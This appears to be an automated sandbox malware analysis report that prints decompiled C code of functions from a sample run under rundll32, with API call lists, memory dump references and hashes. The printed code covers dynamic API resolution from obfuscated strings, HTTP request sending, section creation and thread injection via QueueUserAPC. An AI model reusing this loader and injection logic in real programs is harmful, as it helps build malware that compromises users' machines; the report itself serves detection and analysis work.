                                          Function 048974E0 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E048974E0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04894DF6(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x489a348; // 0x9ad5a8
					_t1 = _t23 + 0x489b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x489a348; // 0x9ad5a8
					_t2 = _t26 + 0x489b769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E04894C73(_t54);
					} else {
						_t30 =  *0x489a348; // 0x9ad5a8
						_t5 = _t30 + 0x489b756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x489a348; // 0x9ad5a8
							_t7 = _t33 + 0x489b40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x489a348; // 0x9ad5a8
								_t9 = _t36 + 0x489b4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x489a348; // 0x9ad5a8
									_t11 = _t39 + 0x489b779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E048925D7(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                          0x048974ef
                                          0x048974f3
                                          0x048975b5
                                          0x048974f9
                                          0x048974f9
                                          0x048974fe
                                          0x04897511
                                          0x04897513
                                          0x04897518
                                          0x04897520
                                          0x04897527
                                          0x04897529
                                          0x0489752e
                                          0x048975ad
                                          0x048975ae
                                          0x04897530
                                          0x04897530
                                          0x04897535
                                          0x0489753d
                                          0x0489753f
                                          0x04897544
                                          0x00000000
                                          0x04897546
                                          0x04897546
                                          0x0489754b
                                          0x04897553
                                          0x04897555
                                          0x0489755a
                                          0x00000000
                                          0x0489755c
                                          0x0489755c
                                          0x04897561
                                          0x04897569
                                          0x0489756b
                                          0x04897570
                                          0x00000000
                                          0x04897572
                                          0x04897572
                                          0x04897577
                                          0x0489757f
                                          0x04897581
                                          0x04897586
                                          0x00000000
                                          0x04897588
                                          0x0489758e
                                          0x04897593
                                          0x0489759a
                                          0x0489759f
                                          0x048975a4
                                          0x00000000
                                          0x048975a6
                                          0x048975a9
                                          0x048975a9
                                          0x048975a4
                                          0x04897586
                                          0x04897570
                                          0x0489755a
                                          0x04897544
                                          0x0489752e
                                          0x048975c3

                                          APIs
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,048923A0,?,?,?,?,00000000,00000000), ref: 04897505
                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04897527
                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 0489753D
                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04897553
                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04897569
                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 0489757F
                                            • Part of subcall function 048925D7: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76D84EE0,00000000,00000000,0489759F), ref: 04892634
                                            • Part of subcall function 048925D7: memset.NTDLL ref: 04892656
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                          • String ID:
                                          • API String ID: 3012371009-0
                                          • Opcode ID: bbff08814d4c293cd1bd711c0c1be9c3273a92f7b13f4e523a3c7610a4680479
                                          • Instruction ID: a312c11f5b759ccc5ab40910ae695609624c2e3a2da0aac52339affbe654010e
                                          • Opcode Fuzzy Hash: bbff08814d4c293cd1bd711c0c1be9c3273a92f7b13f4e523a3c7610a4680479
                                          • Instruction Fuzzy Hash: 242128B1610B0AEFDB90EF69D884E6AB7FCFF446447084A29E515C7211EB74FD048B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B646C8 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • GetModuleHandleA.KERNEL32(?,00000020,?,00008664,00001003,?,?,?,00B5D0A2,?,?,?,00000000,00000000), ref: 00B646ED
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B6470F
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B64725
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B6473B
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B64751
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B64767
                                            • Part of subcall function 00B5DDDD: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76D84EE0,00000000,00000000), ref: 00B5DE3A
                                            • Part of subcall function 00B5DDDD: memset.NTDLL ref: 00B5DE5E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                          • String ID:
                                          • API String ID: 3012371009-0
                                          • Opcode ID: bc20caba8a6e23c0d559e959e99ba2bc74906233a2ea893971b6b738a659b82b
                                          • Instruction ID: 2c7a1607821087e02d046644693716307b0a1f3b230f1219970f57719f817cb8
                                          • Opcode Fuzzy Hash: bc20caba8a6e23c0d559e959e99ba2bc74906233a2ea893971b6b738a659b82b
                                          • Instruction Fuzzy Hash: E2212AB550060AAFDB10DF69DC84E6AB7ECEF0531570144AAE909DB211EB74ED44CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04894BD6 Relevance: 9.0, APIs: 6, Instructions: 45networkCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04894BD6(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0) {
					_t9 = E04895296(__eax + 4, _t18, _a4, __eax, __eax + 4); // executed
					if(_t9 == 0) {
						L9:
						return GetLastError();
					}
				}
				_t10 = E04897A71(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                          0x04894bd6
                                          0x04894be3
                                          0x04894be5
                                          0x04894bf0
                                          0x04894bf7
                                          0x04894c48
                                          0x00000000
                                          0x04894c48
                                          0x04894bf7
                                          0x04894bfd
                                          0x04894c04
                                          0x04894c10
                                          0x04894c15
                                          0x04894c2b
                                          0x04894c3b
                                          0x00000000
                                          0x04894c2d
                                          0x04894c2d
                                          0x04894c34
                                          0x04894c41
                                          0x04894c41
                                          0x04894c41
                                          0x04894c34
                                          0x04894c2b
                                          0x04894c46
                                          0x00000000
                                          0x00000000
                                          0x04894c4c

                                          APIs
                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04895388,?,?,00000000,00000000), ref: 04894C10
                                          • ResetEvent.KERNEL32(?), ref: 04894C15
                                          • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 04894C22
                                          • GetLastError.KERNEL32 ref: 04894C2D
                                          • GetLastError.KERNEL32(?,?,00000102,04895388,?,?,00000000,00000000), ref: 04894C48
                                            • Part of subcall function 04895296: lstrlen.KERNEL32(00000000,00000008,?,76D84D40,?,?,04894BF5,?,?,?,?,00000102,04895388,?,?,00000000), ref: 048952A2
                                            • Part of subcall function 04895296: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04894BF5,?,?,?,?,00000102,04895388,?), ref: 04895300
                                            • Part of subcall function 04895296: lstrcpy.KERNEL32(00000000,00000000), ref: 04895310
                                          • SetEvent.KERNEL32(?), ref: 04894C3B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3739416942-0
                                          • Opcode ID: 68b698739c940edb121c207a479702ee9a6a6811969894fb2913319620894692
                                          • Instruction ID: daf709cf90d828f4d116b1a0e3c9079292a117fd039866dd6ff245e10a5feccb
                                          • Opcode Fuzzy Hash: 68b698739c940edb121c207a479702ee9a6a6811969894fb2913319620894692
                                          • Instruction Fuzzy Hash: F4018F31108A00AEDF306A65DE44F1B76E4EF84B69F180F24E452D21E0DA31FC059621
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B66B34 Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00B5A82F), ref: 00B66B4B
                                          • QueueUserAPC.KERNEL32(00000000,00000000,?,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B66B60
                                          • GetLastError.KERNEL32(00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B66B6B
                                          • TerminateThread.KERNEL32(00000000,00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B66B75
                                          • CloseHandle.KERNEL32(00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B66B7C
                                          • SetLastError.KERNEL32(00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B66B85
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                          • String ID:
                                          • API String ID: 3832013932-0
                                          • Opcode ID: f1a7baeb5bfe500326f62f25f2f867a378d4a8582c1fd74dedff25f76a991054
                                          • Instruction ID: b4050b767a50011b02de3f9bc8c260b0e256a7bec0d0dca8b284f3ba13c8ef31
                                          • Opcode Fuzzy Hash: f1a7baeb5bfe500326f62f25f2f867a378d4a8582c1fd74dedff25f76a991054
                                          • Instruction Fuzzy Hash: C2F01C32205221FFD7226BA0AC08F5BBF69FF59763F454508F60AE3560DF258990CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04896E20 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E04896E20(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x489a3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E04894208( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E04893DCA(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E04894C73(_a8);
						goto L29;
					}
					_t64 =  *0x489a318; // 0x5249da0
					_t16 = _t64 + 0xc; // 0x5249ec2
					_t65 = E04894208(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d048990, executed
						_t67 = E04894C88(_t97,  *_t33, _t91, _a8,  *0x489a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0x489a348; // 0x9ad5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x489ba3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x489b8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E048926E7(_t69,  *0x489a3d4,  *0x489a3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x489a348; // 0x9ad5a8
									_t44 = _t71 + 0x489b846; // 0x74666f53
									_t73 = E04894208(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d048990
										E04893B76( *_t47, _t91, _a8,  *0x489a3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d048990
										E04893B76( *_t49, _t91, _t99,  *0x489a3d0, _a16);
										E04894C73(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d048990, executed
									E04893B76( *_t40, _t91, _a8,  *0x489a3d8, _a24); // executed
									_t43 = _t101 + 0x10; // 0x3d048990
									E04893B76( *_t43, _t91, _a8,  *0x489a3d0, _a16);
								}
								if( *_t101 != 0) {
									E04894C73(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d048990, executed
					_t81 = E04894E0B( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d048990
							E04894C88(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E04894C73(_t100);
						_t98 = _a16;
					}
					E04894C73(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E0489799E(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x489a3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

























                                          0x04896e20
                                          0x04896e29
                                          0x04896e30
                                          0x04896e35
                                          0x04896ea2
                                          0x04896ea8
                                          0x04896ead
                                          0x04896eb4
                                          0x04896eb9
                                          0x04896ebe
                                          0x04897029
                                          0x04897030
                                          0x04897030
                                          0x04897035
                                          0x04897037
                                          0x04897037
                                          0x04897040
                                          0x04897040
                                          0x04896ec4
                                          0x04896ec9
                                          0x04896ed0
                                          0x0489701f
                                          0x04897022
                                          0x00000000
                                          0x04897022
                                          0x04896ed6
                                          0x04896edb
                                          0x04896ede
                                          0x04896ee3
                                          0x04896ee8
                                          0x04896f31
                                          0x04896f31
                                          0x04896f44
                                          0x04896f47
                                          0x04896f4e
                                          0x04896f54
                                          0x04896f5b
                                          0x04896f65
                                          0x04896f65
                                          0x04896f5d
                                          0x04896f5d
                                          0x04896f5d
                                          0x04896f5d
                                          0x04896f87
                                          0x04896f8f
                                          0x04896fbd
                                          0x04896fc2
                                          0x04896fc9
                                          0x04896fce
                                          0x04896fd2
                                          0x04897004
                                          0x04896fd4
                                          0x04896fe1
                                          0x04896fe4
                                          0x04896ff4
                                          0x04896ff7
                                          0x04896ffd
                                          0x04896ffd
                                          0x04896f91
                                          0x04896f9e
                                          0x04896fa1
                                          0x04896fb3
                                          0x04896fb6
                                          0x04896fb6
                                          0x0489700e
                                          0x0489701a
                                          0x04897010
                                          0x04897013
                                          0x04897013
                                          0x0489700e
                                          0x04896f87
                                          0x00000000
                                          0x04896f4e
                                          0x04896ef7
                                          0x04896efa
                                          0x04896f01
                                          0x04896f07
                                          0x04896f0a
                                          0x04896f0c
                                          0x04896f18
                                          0x04896f1b
                                          0x04896f1b
                                          0x04896f21
                                          0x04896f26
                                          0x04896f26
                                          0x04896f2c
                                          0x00000000
                                          0x04896f2c
                                          0x04896e3a
                                          0x00000000
                                          0x04896e61
                                          0x04896e61
                                          0x04896e6d
                                          0x04896e80
                                          0x04896e86
                                          0x04896e8e
                                          0x00000000
                                          0x04896e8e

                                          APIs
                                          • StrChrA.SHLWAPI(04892A82,0000005F,00000000,00000000,00000104), ref: 04896E53
                                          • lstrcpy.KERNEL32(?,?), ref: 04896E80
                                            • Part of subcall function 04894208: lstrlen.KERNEL32(?,00000000,05249DA0,00000000,04892263,05249FC3,69B25F44,?,?,?,?,69B25F44,00000005,0489A00C,4D283A53,?), ref: 0489420F
                                            • Part of subcall function 04894208: mbstowcs.NTDLL ref: 04894238
                                            • Part of subcall function 04894208: memset.NTDLL ref: 0489424A
                                            • Part of subcall function 04893B76: lstrlenW.KERNEL32(?,?,?,04896FE9,3D048990,80000002,04892A82,0489744C,74666F53,4D4C4B48,0489744C,?,3D048990,80000002,04892A82,?), ref: 04893B9B
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          • lstrcpy.KERNEL32(?,00000000), ref: 04896EA2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                          • String ID: ($\
                                          • API String ID: 3924217599-1512714803
                                          • Opcode ID: 4fae8abd3f59ee2d726e3ded4ff55c13d2716f842c175fd0d662e2cae523c0b8
                                          • Instruction ID: d7dee9f4f067ad71a7063d4e5b115a38eed1cc41b730fc7dfcc3ceacb3857562
                                          • Opcode Fuzzy Hash: 4fae8abd3f59ee2d726e3ded4ff55c13d2716f842c175fd0d662e2cae523c0b8
                                          • Instruction Fuzzy Hash: 74514772510A09FFDF11AFA4DC40E9A3BF9EB08758F188E14F911A6120EB75ED21EB11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04892C52 Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 57%
                                          			E04892C52(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E0489175D();
				if(_t21 != 0) {
					_t59 =  *0x489a2fc; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x489a2fc = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x489a178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04895765( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x489a348; // 0x9ad5a8
					if( *0x489a2fc > 5) {
						_t8 = _t26 + 0x489b5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x489b9f5; // 0x44283a44
						_t27 = _t7;
					}
					E04893EF8(_t27, _t27);
					_t31 = E04895410(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x489a310 =  *0x489a310 ^ 0x81bbe65d;
						_t32 = E04894DF6(0x60);
						 *0x489a3cc = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x489a3cc; // 0x52495b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x489a3cc; // 0x52495b0
							 *_t51 = 0x489b81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x489a2d8, 0, 0x43);
							 *0x489a368 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x489a2fc; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x489a348; // 0x9ad5a8
								_t13 = _t58 + 0x489b55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4899287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E048912D3( ~_v8 &  *0x489a310, 0x489a00c); // executed
								_t42 = E0489475F(0, _t55, _t63, 0x489a00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E048921FC(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E04896B13(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E04894ECB(__eflags,  &(_t67[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x489a17c(); // executed
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E04893E6C(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                                          0x04892c52
                                          0x04892c5c
                                          0x04892c5f
                                          0x04892c62
                                          0x04892c65
                                          0x04892c6c
                                          0x04892c6e
                                          0x04892c7a
                                          0x04892c7c
                                          0x04892c7c
                                          0x04892c85
                                          0x04892c8b
                                          0x04892c90
                                          0x04892caa
                                          0x04892cb6
                                          0x04892cb8
                                          0x04892cbd
                                          0x04892cc7
                                          0x04892cc7
                                          0x04892cbf
                                          0x04892cbf
                                          0x04892cbf
                                          0x04892cbf
                                          0x04892cce
                                          0x04892cdb
                                          0x04892ce2
                                          0x04892ce7
                                          0x04892ce7
                                          0x04892cf0
                                          0x04892cf3
                                          0x04892d19
                                          0x04892d25
                                          0x04892d2a
                                          0x04892d2f
                                          0x04892d31
                                          0x04892d5d
                                          0x04892d5f
                                          0x04892d33
                                          0x04892d37
                                          0x04892d3c
                                          0x04892d41
                                          0x04892d48
                                          0x04892d4e
                                          0x04892d53
                                          0x04892d59
                                          0x04892d60
                                          0x04892d62
                                          0x04892d64
                                          0x04892d73
                                          0x04892d79
                                          0x04892d7e
                                          0x04892d80
                                          0x04892db0
                                          0x04892db2
                                          0x04892d82
                                          0x04892d82
                                          0x04892d88
                                          0x04892d95
                                          0x04892d9b
                                          0x04892d9b
                                          0x04892da3
                                          0x04892dac
                                          0x04892db3
                                          0x04892db5
                                          0x04892db7
                                          0x04892dbe
                                          0x04892dcb
                                          0x04892dd0
                                          0x04892dd5
                                          0x04892dd7
                                          0x04892dd9
                                          0x00000000
                                          0x00000000
                                          0x04892ddb
                                          0x04892de0
                                          0x04892de2
                                          0x04892de9
                                          0x04892ded
                                          0x04892df0
                                          0x04892e05
                                          0x04892e09
                                          0x04892e0e
                                          0x00000000
                                          0x04892e0e
                                          0x04892df2
                                          0x04892df4
                                          0x00000000
                                          0x00000000
                                          0x04892dff
                                          0x04892e01
                                          0x04892e03
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04892e03
                                          0x04892de6
                                          0x04892de6
                                          0x04892db7
                                          0x04892cf5
                                          0x04892cf5
                                          0x04892cfa
                                          0x04892e10
                                          0x04892e15
                                          0x04892e1d
                                          0x04892e1d
                                          0x00000000
                                          0x04892e15
                                          0x04892d00
                                          0x04892d03
                                          0x04892d0d
                                          0x04892d14
                                          0x00000000
                                          0x04892e25
                                          0x04892e25
                                          0x04892e28
                                          0x04892e2c
                                          0x04892e2c

                                          APIs
                                            • Part of subcall function 0489175D: GetModuleHandleA.KERNEL32(4C44544E,00000000,04892C6A,00000001), ref: 0489176C
                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04892CE7
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • memset.NTDLL ref: 04892D37
                                          • RtlInitializeCriticalSection.NTDLL(05249570), ref: 04892D48
                                            • Part of subcall function 04894ECB: memset.NTDLL ref: 04894EE5
                                            • Part of subcall function 04894ECB: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04894F2B
                                            • Part of subcall function 04894ECB: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 04894F36
                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04892D73
                                          • wsprintfA.USER32 ref: 04892DA3
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                          • String ID:
                                          • API String ID: 4246211962-0
                                          • Opcode ID: 9ab89c97c2ab909c9cf5b00b779ade5171428ade523fa860de1c3cb795b53e02
